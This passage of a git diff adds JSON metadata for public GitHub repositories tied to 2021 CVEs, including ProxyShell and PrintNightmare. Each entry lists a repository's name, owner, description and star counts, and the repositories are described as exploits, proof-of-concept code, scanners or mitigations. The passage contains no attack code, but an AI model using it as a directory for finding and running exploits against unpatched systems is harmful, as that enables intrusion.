+ "html_url": "https:\/\/github.com\/RaouzRouik\/CVE-2021-34473-scanner",
+ "description": "Scanner for CVE-2021-34473, ProxyShell, A Microsoft Exchange On-premise Vulnerability",
+ "fork": false,
+ "created_at": "2021-08-11T12:20:07Z",
+ "updated_at": "2021-12-22T09:48:36Z",
+ "pushed_at": "2021-08-11T12:55:36Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 396762986,
+ "name": "CVE-2021-34473",
+ "full_name": "p2-98\/CVE-2021-34473",
+ "owner": {
+ "login": "p2-98",
+ "id": 22283229,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22283229?v=4",
+ "html_url": "https:\/\/github.com\/p2-98"
+ },
+ "html_url": "https:\/\/github.com\/p2-98\/CVE-2021-34473",
+ "description": "CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability",
+ "fork": false,
+ "created_at": "2021-08-16T11:27:13Z",
+ "updated_at": "2024-01-01T19:35:50Z",
+ "pushed_at": "2021-08-16T09:00:06Z",
+ "stargazers_count": 31,
+ "watchers_count": 31,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 31,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 403092854,
+ "name": "proxyshell",
+ "full_name": "horizon3ai\/proxyshell",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/proxyshell",
+ "description": "Proof of Concept for CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207",
+ "fork": false,
+ "created_at": "2021-09-04T15:34:03Z",
+ "updated_at": "2024-06-21T14:50:18Z",
+ "pushed_at": "2023-08-25T22:42:24Z",
+ "stargazers_count": 106,
+ "watchers_count": 106,
+ "has_discussions": false,
+ "forks_count": 36,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 36,
+ "watchers": 106,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 430609692,
+ "name": "CVE-2021-34473-Exchange-ProxyShell",
+ "full_name": "je6k\/CVE-2021-34473-Exchange-ProxyShell",
+ "owner": {
+ "login": "je6k",
+ "id": 29349902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29349902?v=4",
+ "html_url": "https:\/\/github.com\/je6k"
+ },
+ "html_url": "https:\/\/github.com\/je6k\/CVE-2021-34473-Exchange-ProxyShell",
+ "description": "对Exchange Proxyshell 做了二次修改,精确的拆分、实现辅助性安全测试。",
+ "fork": false,
+ "created_at": "2021-11-22T07:47:09Z",
+ "updated_at": "2023-12-07T07:48:45Z",
+ "pushed_at": "2021-11-23T09:56:37Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448942702,
+ "name": "ProxyShell-CVE-2021-34473.py",
+ "full_name": "jrgdiaz\/ProxyShell-CVE-2021-34473.py",
+ "owner": {
+ "login": "jrgdiaz",
+ "id": 17464377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17464377?v=4",
+ "html_url": "https:\/\/github.com\/jrgdiaz"
+ },
+ "html_url": "https:\/\/github.com\/jrgdiaz\/ProxyShell-CVE-2021-34473.py",
+ "description": "A simple script to check for ProxyShell",
+ "fork": false,
+ "created_at": "2022-01-17T15:12:58Z",
+ "updated_at": "2022-04-21T23:00:12Z",
+ "pushed_at": "2022-01-17T15:19:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 508685161,
+ "name": "ProxyShell",
+ "full_name": "kh4sh3i\/ProxyShell",
+ "owner": {
+ "login": "kh4sh3i",
+ "id": 64693844,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4",
+ "html_url": "https:\/\/github.com\/kh4sh3i"
+ },
+ "html_url": "https:\/\/github.com\/kh4sh3i\/ProxyShell",
+ "description": "CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability",
+ "fork": false,
+ "created_at": "2022-06-29T12:37:31Z",
+ "updated_at": "2024-06-21T00:10:10Z",
+ "pushed_at": "2022-06-30T08:36:58Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 566698177,
+ "name": "CVE-2021-34473-NMAP-SCANNER",
+ "full_name": "ipsBruno\/CVE-2021-34473-NMAP-SCANNER",
+ "owner": {
+ "login": "ipsBruno",
+ "id": 6839604,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6839604?v=4",
+ "html_url": "https:\/\/github.com\/ipsBruno"
+ },
+ "html_url": "https:\/\/github.com\/ipsBruno\/CVE-2021-34473-NMAP-SCANNER",
+ "description": "A massive scanner for CVE-2021-34473 Microsoft Exchange Windows Vulnerability",
+ "fork": false,
+ "created_at": "2022-11-16T08:22:29Z",
+ "updated_at": "2023-05-06T05:33:04Z",
+ "pushed_at": "2022-11-16T08:36:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 706066499,
+ "name": "CVE",
+ "full_name": "f4alireza\/CVE",
+ "owner": {
+ "login": "f4alireza",
+ "id": 87991945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87991945?v=4",
+ "html_url": "https:\/\/github.com\/f4alireza"
+ },
+ "html_url": "https:\/\/github.com\/f4alireza\/CVE",
+ "description": "Proxyshell for Exploiting CVE-2021-34473",
+ "fork": false,
+ "created_at": "2023-10-17T08:38:08Z",
+ "updated_at": "2023-10-17T08:40:37Z",
+ "pushed_at": "2023-10-17T08:40:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34481.json b/2021/CVE-2021-34481.json
new file mode 100644
index 0000000000..2070c764f4
--- /dev/null
+++ b/2021/CVE-2021-34481.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395059295,
+ "name": "CVE-2021-34481",
+ "full_name": "vpn28\/CVE-2021-34481",
+ "owner": {
+ "login": "vpn28",
+ "id": 20010038,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20010038?v=4",
+ "html_url": "https:\/\/github.com\/vpn28"
+ },
+ "html_url": "https:\/\/github.com\/vpn28\/CVE-2021-34481",
+ "description": "Check patch for CVE-2021-34481",
+ "fork": false,
+ "created_at": "2021-08-11T16:56:10Z",
+ "updated_at": "2023-05-12T09:43:59Z",
+ "pushed_at": "2021-08-11T17:01:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34486.json b/2021/CVE-2021-34486.json
new file mode 100644
index 0000000000..5093fa9309
--- /dev/null
+++ b/2021/CVE-2021-34486.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 416174012,
+ "name": "CVE-2021-34486",
+ "full_name": "KaLendsi\/CVE-2021-34486",
+ "owner": {
+ "login": "KaLendsi",
+ "id": 68001644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4",
+ "html_url": "https:\/\/github.com\/KaLendsi"
+ },
+ "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-34486",
+ "description": "Windows Etw LPE",
+ "fork": false,
+ "created_at": "2021-10-12T03:50:44Z",
+ "updated_at": "2023-09-28T11:32:16Z",
+ "pushed_at": "2021-10-12T05:52:00Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 25,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 25,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 421793459,
+ "name": "CVE-2021-34486-exp",
+ "full_name": "b1tg\/CVE-2021-34486-exp",
+ "owner": {
+ "login": "b1tg",
+ "id": 33436708,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33436708?v=4",
+ "html_url": "https:\/\/github.com\/b1tg"
+ },
+ "html_url": "https:\/\/github.com\/b1tg\/CVE-2021-34486-exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-27T11:39:08Z",
+ "updated_at": "2021-10-27T11:39:31Z",
+ "pushed_at": "2021-10-27T11:39:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3449.json b/2021/CVE-2021-3449.json
new file mode 100644
index 0000000000..21a29d92e7
--- /dev/null
+++ b/2021/CVE-2021-3449.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 351622243,
+ "name": "cve-2021-3449",
+ "full_name": "riptl\/cve-2021-3449",
+ "owner": {
+ "login": "riptl",
+ "id": 21371810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21371810?v=4",
+ "html_url": "https:\/\/github.com\/riptl"
+ },
+ "html_url": "https:\/\/github.com\/riptl\/cve-2021-3449",
+ "description": "CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻💻",
+ "fork": false,
+ "created_at": "2021-03-26T01:09:25Z",
+ "updated_at": "2024-06-06T18:41:09Z",
+ "pushed_at": "2021-08-25T01:00:49Z",
+ "stargazers_count": 225,
+ "watchers_count": 225,
+ "has_discussions": false,
+ "forks_count": 42,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3449",
+ "denial-of-service",
+ "exploit",
+ "openssl",
+ "tls"
+ ],
+ "visibility": "public",
+ "forks": 42,
+ "watchers": 225,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34496.json b/2021/CVE-2021-34496.json
new file mode 100644
index 0000000000..483c70d430
--- /dev/null
+++ b/2021/CVE-2021-34496.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 386161559,
+ "name": "CVE-2021-34496",
+ "full_name": "dja2TaqkGEEfA45\/CVE-2021-34496",
+ "owner": {
+ "login": "dja2TaqkGEEfA45",
+ "id": 82131630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4",
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45"
+ },
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-34496",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-15T04:23:58Z",
+ "updated_at": "2021-07-15T04:23:58Z",
+ "pushed_at": "2021-07-15T04:23:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34523.json b/2021/CVE-2021-34523.json
new file mode 100644
index 0000000000..990bf755df
--- /dev/null
+++ b/2021/CVE-2021-34523.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 412723954,
+ "name": "ProxyShell_POC",
+ "full_name": "mithridates1313\/ProxyShell_POC",
+ "owner": {
+ "login": "mithridates1313",
+ "id": 84065796,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84065796?v=4",
+ "html_url": "https:\/\/github.com\/mithridates1313"
+ },
+ "html_url": "https:\/\/github.com\/mithridates1313\/ProxyShell_POC",
+ "description": "POC for scanning ProxyShell(CVE-2021-34523,CVE-2021-34473,CVE-2021-31207)",
+ "fork": false,
+ "created_at": "2021-10-02T07:29:24Z",
+ "updated_at": "2024-04-24T17:28:29Z",
+ "pushed_at": "2021-10-06T11:35:20Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 686328822,
+ "name": "CVE-2021-34523",
+ "full_name": "SUPRAAA-1337\/CVE-2021-34523",
+ "owner": {
+ "login": "SUPRAAA-1337",
+ "id": 128395905,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128395905?v=4",
+ "html_url": "https:\/\/github.com\/SUPRAAA-1337"
+ },
+ "html_url": "https:\/\/github.com\/SUPRAAA-1337\/CVE-2021-34523",
+ "description": "test-yaml",
+ "fork": false,
+ "created_at": "2023-09-02T12:26:18Z",
+ "updated_at": "2024-03-18T17:53:18Z",
+ "pushed_at": "2023-09-02T21:18:10Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34527.json b/2021/CVE-2021-34527.json
new file mode 100644
index 0000000000..a4dbe01534
--- /dev/null
+++ b/2021/CVE-2021-34527.json
@@ -0,0 +1,757 @@
+[
+ {
+ "id": 382021281,
+ "name": "CVE-2021-34527",
+ "full_name": "DenizSe\/CVE-2021-34527",
+ "owner": {
+ "login": "DenizSe",
+ "id": 43039427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43039427?v=4",
+ "html_url": "https:\/\/github.com\/DenizSe"
+ },
+ "html_url": "https:\/\/github.com\/DenizSe\/CVE-2021-34527",
+ "description": "Small Powershell Script to detect Running Printer Spoolers on Domain Controller",
+ "fork": false,
+ "created_at": "2021-07-01T12:12:16Z",
+ "updated_at": "2021-07-02T07:49:06Z",
+ "pushed_at": "2021-07-02T07:45:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-1675",
+ "cve-2021-34527",
+ "domaincontroller",
+ "printnightmare",
+ "printspooler"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382267064,
+ "name": "PrintNightmare",
+ "full_name": "thomas-lauer\/PrintNightmare",
+ "owner": {
+ "login": "thomas-lauer",
+ "id": 7205231,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7205231?v=4",
+ "html_url": "https:\/\/github.com\/thomas-lauer"
+ },
+ "html_url": "https:\/\/github.com\/thomas-lauer\/PrintNightmare",
+ "description": "Kritische Sicherheitslücke PrintNightmare CVE-2021-34527",
+ "fork": false,
+ "created_at": "2021-07-02T07:30:52Z",
+ "updated_at": "2023-09-28T11:29:11Z",
+ "pushed_at": "2021-07-12T15:07:05Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382335385,
+ "name": "CVE-2021-34527",
+ "full_name": "JohnHammond\/CVE-2021-34527",
+ "owner": {
+ "login": "JohnHammond",
+ "id": 6288722,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4",
+ "html_url": "https:\/\/github.com\/JohnHammond"
+ },
+ "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2021-34527",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-02T12:10:49Z",
+ "updated_at": "2024-06-21T03:34:16Z",
+ "pushed_at": "2021-07-02T12:17:50Z",
+ "stargazers_count": 241,
+ "watchers_count": 241,
+ "has_discussions": false,
+ "forks_count": 62,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 62,
+ "watchers": 241,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 382645654,
+ "name": "PrintNightmare-CVE-2021-34527",
+ "full_name": "nemo-wq\/PrintNightmare-CVE-2021-34527",
+ "owner": {
+ "login": "nemo-wq",
+ "id": 28733668,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28733668?v=4",
+ "html_url": "https:\/\/github.com\/nemo-wq"
+ },
+ "html_url": "https:\/\/github.com\/nemo-wq\/PrintNightmare-CVE-2021-34527",
+ "description": "PrintNightmare - Windows Print Spooler RCE\/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675) proof of concept exploits",
+ "fork": false,
+ "created_at": "2021-07-03T15:15:12Z",
+ "updated_at": "2024-06-15T14:05:55Z",
+ "pushed_at": "2021-09-13T12:12:17Z",
+ "stargazers_count": 115,
+ "watchers_count": 115,
+ "has_discussions": false,
+ "forks_count": 39,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-1675",
+ "cve-2021-34527",
+ "howto-tutorial",
+ "printnightmare",
+ "rce",
+ "windowsexploits"
+ ],
+ "visibility": "public",
+ "forks": 39,
+ "watchers": 115,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 382894525,
+ "name": "CVE-2021-34527-1675",
+ "full_name": "CnOxx1\/CVE-2021-34527-1675",
+ "owner": {
+ "login": "CnOxx1",
+ "id": 86923954,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86923954?v=4",
+ "html_url": "https:\/\/github.com\/CnOxx1"
+ },
+ "html_url": "https:\/\/github.com\/CnOxx1\/CVE-2021-34527-1675",
+ "description": "Cve-2021-1675 or cve-2021-34527? Detailed analysis and exploitation of windows print spooler 0day vulnerability!!!",
+ "fork": false,
+ "created_at": "2021-07-04T16:09:18Z",
+ "updated_at": "2021-09-06T06:08:09Z",
+ "pushed_at": "2021-07-04T16:31:21Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": true,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 383207766,
+ "name": "disable-RegisterSpoolerRemoteRpcEndPoint",
+ "full_name": "rdboboia\/disable-RegisterSpoolerRemoteRpcEndPoint",
+ "owner": {
+ "login": "rdboboia",
+ "id": 37208426,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37208426?v=4",
+ "html_url": "https:\/\/github.com\/rdboboia"
+ },
+ "html_url": "https:\/\/github.com\/rdboboia\/disable-RegisterSpoolerRemoteRpcEndPoint",
+ "description": "Workaround for Windows Print Spooler Remote Code Execution Vulnerability(CVE-2021-34527). See: https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2021-34527",
+ "fork": false,
+ "created_at": "2021-07-05T16:49:32Z",
+ "updated_at": "2021-07-08T21:11:43Z",
+ "pushed_at": "2021-07-08T21:11:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 383223006,
+ "name": "CVE-2021-34527-PrintNightmare-Workaround",
+ "full_name": "geekbrett\/CVE-2021-34527-PrintNightmare-Workaround",
+ "owner": {
+ "login": "geekbrett",
+ "id": 22183376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22183376?v=4",
+ "html_url": "https:\/\/github.com\/geekbrett"
+ },
+ "html_url": "https:\/\/github.com\/geekbrett\/CVE-2021-34527-PrintNightmare-Workaround",
+ "description": "This simple PowerShell script is in response to the \"PrintNightmare\" vulnerability. This was designed to give a end user the ability to stop and disable the \"Print Spooler\" service on their computer while awaiting a fix from Microsoft.",
+ "fork": false,
+ "created_at": "2021-07-05T17:50:56Z",
+ "updated_at": "2022-03-18T12:17:32Z",
+ "pushed_at": "2021-07-07T17:18:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 383254488,
+ "name": "ItWasAllADream",
+ "full_name": "byt3bl33d3r\/ItWasAllADream",
+ "owner": {
+ "login": "byt3bl33d3r",
+ "id": 5151193,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5151193?v=4",
+ "html_url": "https:\/\/github.com\/byt3bl33d3r"
+ },
+ "html_url": "https:\/\/github.com\/byt3bl33d3r\/ItWasAllADream",
+ "description": "A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE",
+ "fork": false,
+ "created_at": "2021-07-05T20:13:49Z",
+ "updated_at": "2024-06-23T03:05:20Z",
+ "pushed_at": "2024-05-19T16:25:52Z",
+ "stargazers_count": 768,
+ "watchers_count": 768,
+ "has_discussions": false,
+ "forks_count": 117,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 117,
+ "watchers": 768,
+ "score": 0,
+ "subscribers_count": 10
+ },
+ {
+ "id": 383699836,
+ "name": "Disable-Spooler-Service-PrintNightmare-CVE-2021-34527",
+ "full_name": "vinaysudheer\/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527",
+ "owner": {
+ "login": "vinaysudheer",
+ "id": 29897973,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29897973?v=4",
+ "html_url": "https:\/\/github.com\/vinaysudheer"
+ },
+ "html_url": "https:\/\/github.com\/vinaysudheer\/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527",
+ "description": "Simple batch script to disable the Microsoft Print Spooler service from system",
+ "fork": false,
+ "created_at": "2021-07-07T06:41:15Z",
+ "updated_at": "2021-07-07T06:47:16Z",
+ "pushed_at": "2021-07-07T06:47:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 383719689,
+ "name": "PrintNightmare-CVE-2021-34527",
+ "full_name": "powershellpr0mpt\/PrintNightmare-CVE-2021-34527",
+ "owner": {
+ "login": "powershellpr0mpt",
+ "id": 9294993,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9294993?v=4",
+ "html_url": "https:\/\/github.com\/powershellpr0mpt"
+ },
+ "html_url": "https:\/\/github.com\/powershellpr0mpt\/PrintNightmare-CVE-2021-34527",
+ "description": "How to fix the PrintNightmare vulnerability",
+ "fork": false,
+ "created_at": "2021-07-07T07:58:53Z",
+ "updated_at": "2023-07-30T11:49:05Z",
+ "pushed_at": "2021-07-07T10:00:32Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 383968301,
+ "name": "CVE-2021-34527_ACL_mitigation",
+ "full_name": "WidespreadPandemic\/CVE-2021-34527_ACL_mitigation",
+ "owner": {
+ "login": "WidespreadPandemic",
+ "id": 75406207,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75406207?v=4",
+ "html_url": "https:\/\/github.com\/WidespreadPandemic"
+ },
+ "html_url": "https:\/\/github.com\/WidespreadPandemic\/CVE-2021-34527_ACL_mitigation",
+ "description": "Mitigation for CVE-2021-34527 RCE by setting WRITE ACLs",
+ "fork": false,
+ "created_at": "2021-07-08T01:32:18Z",
+ "updated_at": "2021-07-09T03:54:14Z",
+ "pushed_at": "2021-07-09T03:54:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 384221697,
+ "name": "printnightmare",
+ "full_name": "glorisonlai\/printnightmare",
+ "owner": {
+ "login": "glorisonlai",
+ "id": 26339805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26339805?v=4",
+ "html_url": "https:\/\/github.com\/glorisonlai"
+ },
+ "html_url": "https:\/\/github.com\/glorisonlai\/printnightmare",
+ "description": "CVE-2021-34527 implementation",
+ "fork": false,
+ "created_at": "2021-07-08T18:56:04Z",
+ "updated_at": "2021-07-08T18:56:07Z",
+ "pushed_at": "2021-07-08T18:56:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 384372251,
+ "name": "CVE-2021-34527-Scanner-Based-On-cube0x0-POC",
+ "full_name": "dywhoami\/CVE-2021-34527-Scanner-Based-On-cube0x0-POC",
+ "owner": {
+ "login": "dywhoami",
+ "id": 87174410,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87174410?v=4",
+ "html_url": "https:\/\/github.com\/dywhoami"
+ },
+ "html_url": "https:\/\/github.com\/dywhoami\/CVE-2021-34527-Scanner-Based-On-cube0x0-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-09T08:27:36Z",
+ "updated_at": "2024-01-30T02:03:36Z",
+ "pushed_at": "2021-07-11T00:23:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 384385967,
+ "name": "Printnightmare",
+ "full_name": "Eutectico\/Printnightmare",
+ "owner": {
+ "login": "Eutectico",
+ "id": 30925137,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30925137?v=4",
+ "html_url": "https:\/\/github.com\/Eutectico"
+ },
+ "html_url": "https:\/\/github.com\/Eutectico\/Printnightmare",
+ "description": "Fix for PrintNightmare CVE-2021-34527",
+ "fork": false,
+ "created_at": "2021-07-09T09:22:03Z",
+ "updated_at": "2021-07-09T11:02:54Z",
+ "pushed_at": "2021-07-09T11:02:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
